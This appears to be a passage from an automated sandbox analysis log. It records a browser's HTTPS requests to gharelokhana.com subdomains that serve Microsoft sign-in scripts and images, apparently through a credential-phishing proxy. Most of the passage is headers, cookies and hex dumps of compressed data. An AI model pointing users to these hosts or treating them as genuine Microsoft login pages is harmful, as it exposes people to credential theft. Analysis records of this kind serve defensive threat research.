                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:52 UTC5538INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                                                                                                                                                                Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                26192.168.2.849784164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:51 UTC810OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:52 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:52 GMT
                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F48EC4154
                                                                                                                                                                                                x-ms-request-id: e8b4b3ca-501e-0038-2ddb-44583b000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072452Z-16c5c9558c622b78hC1DUSqxsc00000007ag00000000ew9d
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:52 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                                                                                                                                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                                                                                                                                                                2024-12-05 07:24:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                27192.168.2.849785164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:51 UTC804OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:52 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:52 GMT
                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F4904824B
                                                                                                                                                                                                x-ms-request-id: aa2ece26-e01e-004f-52d0-448daf000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072452Z-15b54885d96b2wtthC1FRAycng00000007r0000000000b01
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:52 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                                                                                                                                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                                                                                                                                                                2024-12-05 07:24:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                28192.168.2.849786164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:51 UTC569OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:53 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:52 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 116430
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                                                                                                etag: 0x8DCBD5317046A2F
                                                                                                                                                                                                x-ms-request-id: fe4eb8a5-101e-005b-2e8c-46c5c0000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072452Z-15d6f6465c8fl8rshC1DUS58g800000000z000000000spc2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:53 UTC15577INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                                                                                                                                                                Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                                                                                                                                                                2024-12-05 07:24:53 UTC16379INData Raw: e2 39 6d ac 49 a1 a5 bd 69 3f ec 3f f5 3a 93 4e 23 4d 58 59 50 b3 db 2e 14 c6 f1 60 a8 76 39 a2 ca 7d 0a c4 6c 46 7b 28 72 48 0c 1b 29 1f 49 83 69 74 84 3e 47 59 e0 42 9b b2 5c ca 98 89 5e 36 a7 a4 0f a8 17 38 0d 53 1c 3e 97 dc 1a 24 8a 0d 4a a7 01 95 50 e2 5c ba e4 79 91 1d cc fc 76 23 bb 17 59 49 55 e3 fb 1d 24 72 d5 75 be 53 62 b7 c3 d2 4d f8 e3 e1 9f 08 fe 94 d8 cb 4c b2 60 93 d3 a2 08 88 dd c2 8c 74 9f 8e 83 c4 ee be 3e 32 f9 4f b1 b5 a0 9d 4a e3 1e bb 1b c2 01 c9 77 a3 9e bf 9f 52 88 74 4a 42 90 30 df 82 5a d0 06 7b 03 ab 1b c3 71 f0 37 c6 a2 a7 e2 09 4c c4 d8 f5 2d 06 8f 9b b6 66 2a 5d 1b ff 14 d3 96 df 40 23 45 2c e6 6f b8 f8 2d c3 e6 72 1b e8 a8 e9 1d a4 c2 29 72 c3 23 61 49 cf 47 e7 27 7f 63 23 57 ee 4e 51 25 3b 81 a7 93 7d af 37 d1 7a d7 44 92
                                                                                                                                                                                                Data Ascii: 9mIi??:N#MXYP.`v9}lF{(rH)Iit>GYB\^68S>$JP\yv#YIU$ruSbML`t>2OJwRtJB0Z{q7L-f*]@#E,o-r)r#aIG'c#WNQ%;}7zD
                                                                                                                                                                                                2024-12-05 07:24:53 UTC16384INData Raw: 6c 5b 0d 23 c5 92 bb a1 e1 15 06 9c d6 98 ca d8 18 90 d7 dc e5 ea 82 7d ef 09 95 45 f9 9b a8 2c 50 ab 22 54 16 07 ad ed 7f 4f 95 05 39 db b1 52 4f 3d 7c a6 5a 52 28 25 95 26 2d d3 6a b4 05 6d 70 f8 b5 b5 c1 c0 d7 03 43 25 ce 84 c4 47 f9 32 80 36 71 44 13 e5 59 a1 c8 da 20 11 59 35 1d 81 6d f1 2b 6a f5 ac 27 40 2f 28 86 df 62 1f f3 6f b7 3c 9f c2 e3 66 68 ea 81 e7 cd 61 4e 43 da 42 bb 8e b0 85 86 42 7e f2 cf 80 bb 44 04 66 36 07 4b 4d 46 51 68 32 c1 4f 92 a1 8f 45 af ca 92 ca 30 00 73 38 77 93 af 7e 82 38 80 66 ee ee ee 3e 1e 0d f8 b1 fd 02 59 5a 3c 2d 7b 1e 99 c6 a8 18 a5 7d e7 d3 a7 21 cc 63 f3 e7 fc 53 3e 01 6c 35 fa f4 09 53 f4 c5 6e dd 0b 86 be 25 2e f0 49 c0 ba 41 ef 08 2a fa 01 a1 c5 e3 52 af 07 51 e6 3b db cd ed fd 66 db 61 d7 e8 a4 95 f4 9c 59 09
                                                                                                                                                                                                Data Ascii: l[#}E,P"TO9RO=|ZR(%&-jmpC%G26qDY Y5m+j'@/(bo<fhaNCBB~Df6KMFQh2OE0s8w~8f>YZ<-{}!cS>l5Sn%.IA*RQ;faY
                                                                                                                                                                                                2024-12-05 07:24:53 UTC16384INData Raw: ff fc 79 7a 9d a4 b3 ff 06 14 ef 48 cb 38 c7 ab 09 7a 46 c6 39 c5 80 b4 48 64 ef 31 c1 d9 15 1e 34 88 e9 50 eb da 43 f5 a4 4b d5 22 95 36 9d 0c 3d 2b 40 a3 25 f6 63 4e 1e 2f 28 42 f3 a0 0d 9b 16 36 c7 b0 55 c3 e6 b8 9b 1e e5 5d e5 45 7b 0f 1c 94 61 e0 d8 cf d1 5e 1d b8 a9 49 6f e4 96 ee 0d 5e 1d 37 9e e7 d3 cf eb e0 4a b6 79 09 6c f3 f5 d1 65 d7 03 c6 a4 7f 09 df 20 ed b7 1e bb 33 76 c3 ee d1 f8 25 43 6d f8 0d fc 63 04 bd f0 27 bf dc b6 45 1d f0 fd 2a bc 92 c6 0b b1 1f 87 d8 26 c5 47 8a 95 ad 3f a2 be aa cb 44 9d a9 0b 0f 4c aa 76 ba 33 08 3a 6c 1d d3 c3 74 04 3b 56 83 d8 b5 17 99 b1 0f 24 ae 24 4a a6 04 5e 8f a3 5b 61 35 96 63 c1 4c 79 5c 89 e0 5c fd 41 77 76 44 34 46 dc 1f c9 a5 74 27 3d b2 0c 4b 7d e4 15 33 0f 85 d7 2e 10 9f bd 3e 74 00 60 33 f0 f1 5f
                                                                                                                                                                                                Data Ascii: yzH8zF9Hd14PCK"6=+@%cN/(B6U]E{a^Io^7Jyle 3v%Cmc'E*&G?DLv3:lt;V$$J^[a5cLy\\AwvD4Ft'=K}3.>t`3_
                                                                                                                                                                                                2024-12-05 07:24:53 UTC16384INData Raw: 3d 01 fc f6 c1 7f 6d f6 70 e2 b8 ef a1 44 9c 92 8e fd d1 2d ed 9b f7 7c 35 76 df 40 f5 b7 c8 4c fe 84 ff bc 44 6f cd 93 a3 f7 14 16 ed c3 91 df ef c1 79 f4 4f 06 d3 e4 36 c4 e8 63 95 86 01 05 5d 5f a2 aa 8f ab 0e 2e e0 35 cb d3 4e 10 24 3e fa cf 47 cf 8d e8 77 1f d0 10 60 67 e7 cd f0 a5 7f e1 7d c4 88 7d d1 47 c4 af 1f 39 69 cf 47 4e 92 0c ef b0 62 70 77 87 7f 26 fc 67 b9 b3 53 ee b9 d5 c5 e4 b1 c8 86 6f 9f de dd 9d 96 55 3d fe a9 8a 09 08 f4 f5 04 39 de 53 41 99 c3 9f a0 f9 e7 cc fa de 62 1d cf 22 69 84 25 fe 75 9c 04 e8 44 c4 59 17 2b 4c a0 15 ea dc ea 38 92 84 07 14 d1 c2 b8 17 be 6a 45 c4 cc e5 66 7e 5e 02 fd e6 dd f8 f4 e1 10 a0 15 c5 05 2b 5c 4e 68 ed 0a 05 13 ff 6d 87 b0 68 ea 5a bc 71 71 62 9c 78 e0 dc 0f 07 a5 39 9f b7 bb a8 08 cd 06 ce 79 1b f6
                                                                                                                                                                                                Data Ascii: =mpD-|5v@LDoyO6c]_.5N$>Gw`g}}G9iGNbpw&gSoU=9SAb"i%uDY+L8jEf~^+\NhmhZqqbx9y
                                                                                                                                                                                                2024-12-05 07:24:53 UTC10657INData Raw: 93 85 fb 9b 3e 86 ba 40 83 f7 21 a5 8d fa bb a7 4b 8c c0 ed c7 73 06 bb 2c 57 6e 69 58 a6 39 6e a7 9b cf f3 7c ae 15 5e 2f 2d e5 44 e5 58 5a fb f6 c8 d8 03 1a ab 9b 69 d5 be dd 48 f9 aa 41 27 b7 1f 33 05 3f c9 1a 38 3d c8 1a 3d 3d f8 ce 29 a0 36 7e fc 3c f0 3e 6f 3c 19 b5 5a 99 0f ed ad 15 84 6b 6f 1c 5e fd c7 0f 02 5b fd ce 31 a4 17 75 bd 81 fc 45 4b 12 37 bd f9 90 1a 3c db bd 20 1f 02 49 3e 44 92 50 b2 04 d5 f0 cc f8 c6 56 86 28 77 79 2c ca 48 ca dd 94 79 87 13 d3 54 01 a7 a9 d0 e7 bb 1c 1f 71 32 23 2b d0 5e 68 62 81 07 75 99 a5 25 eb 95 66 c4 ed 60 b6 3a 02 e5 1c 1c c4 ba e3 43 39 07 95 4d e6 e0 9d 35 cd 22 2b cc 40 8c cf c5 08 29 89 cf 3e 12 8e 3a 72 33 30 1e c3 48 06 89 03 44 5a a4 cc 2a 1b 81 04 b3 b7 1a 7d fd a9 91 49 ac 02 dc a8 b0 af 44 2e 1c c7
                                                                                                                                                                                                Data Ascii: >@!Ks,WniX9n|^/-DXZiHA'3?8===)6~<>o<Zko^[1uEK7< I>DPV(wy,HyTq2#+^hbu%f`:C9M5"+@)>:r30HDZ*}ID.
                                                                                                                                                                                                2024-12-05 07:24:53 UTC16384INData Raw: 7d 36 83 b3 d0 1c e9 65 63 81 2e d0 fa 9d c1 b5 b8 a8 60 b8 2b c9 bc af f3 79 2e d0 67 4a 98 78 e4 19 e9 4b 33 66 f3 37 c8 20 62 3e 77 71 8c 50 1d df 77 e3 f7 93 17 5d a1 5f f5 59 8f bf 8d d2 4b 72 20 96 f7 d0 17 8a b8 24 f3 08 ea 7d e8 08 34 6a 64 44 aa 80 06 3d a0 85 66 a8 ce 13 25 db a1 6d 81 14 1a 15 e9 ea d1 38 30 5a 41 ca 82 37 63 cb 06 8f 21 43 c4 54 5e 1c 56 5b a1 2d 02 7a f6 e3 b6 85 cc ed 7a 50 5b b2 48 83 de 89 0e 37 1f 90 3f 05 ac 5c 12 05 2c 19 ca f3 51 07 57 ad 65 e3 4f 4a b7 18 8a 06 c8 5d fe a4 5b 0c a6 36 ec 49 2e 86 84 52 3c e4 1f df 8b 65 be 17 6b f5 7d 61 60 86 d6 5d 64 60 b6 2f 42 05 d6 ea 07 dc c0 ac 51 2d 0b 03 33 14 5d 4c e4 2e bf a1 b7 84 81 19 9a 8b 95 6c 97 76 2e 19 99 91 9d da 15 55 a9 71 1b b3 3a 76 88 db 98 35 d0 c6 ec 4a d7
                                                                                                                                                                                                Data Ascii: }6ec.`+y.gJxK3f7 b>wqPw]_YKr $}4jdD=f%m80ZA7c!CT^V[-zzP[H7?\,QWeOJ][6I.R<ek}a`]d`/BQ-3]L.lv.Uq:v5J
                                                                                                                                                                                                2024-12-05 07:24:53 UTC8281INData Raw: 80 8d a8 9b 8f 9a ac 9b df e8 13 4f 35 7f e0 ed 67 24 4b e5 a6 56 69 6f 72 17 60 db 88 e6 e1 c9 c6 53 f8 3e f7 5f 1a 4a 48 ee f7 d5 de 15 56 f8 d6 79 ae 1c 2d da c2 2d 3e 92 b7 cb be 29 64 be f0 98 d5 f0 ee 74 88 43 02 98 88 7c 36 be 07 f8 83 eb 68 41 bf 30 3a a2 58 4a 0b fd f1 10 2d c7 8e 1a 31 1b af 2c 67 54 8b ab 3f cb 15 56 19 0e 55 82 65 10 30 ba 80 5c 77 55 e0 bd 4a b0 0c 9a c4 68 41 ac bf 6e 41 25 58 06 f6 d7 05 88 09 93 99 7f a4 17 4b 20 ac 62 a6 42 37 7e 54 09 96 81 dd 8c 6e 50 04 36 d9 05 7a b1 04 26 32 fb ca fb c9 e8 ab 4c b0 0c 38 af 0b f0 e6 52 d9 8f c4 ab a5 60 71 39 2b ef ba 52 01 91 a8 07 07 bb 50 0f 8c 5e 2c 01 dd 2c f6 d9 87 b9 f2 e4 6f 47 6f 5e 57 c6 97 12 fb ca 3c e4 0b c7 bd 29 39 58 52 f5 dc 11 f9 eb 81 35 09 ef a8 4f 73 ff 59 6b 98
                                                                                                                                                                                                Data Ascii: O5g$KVior`S>_JHVy-->)dtC|6hA0:XJ-1,gT?VUe0\wUJhAnA%XK bB7~TnP6z&2L8R`q9+RP^,,oGo^W<)9XR5OsYk


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                29192.168.2.849789164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:53 UTC731OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: dqP/U45K2Fb1jc/ls5NZPw==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:24:53 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:53 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 713cb92a-3ead-48e3-bdad-6d59e967a301
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                30192.168.2.849795164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC804OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
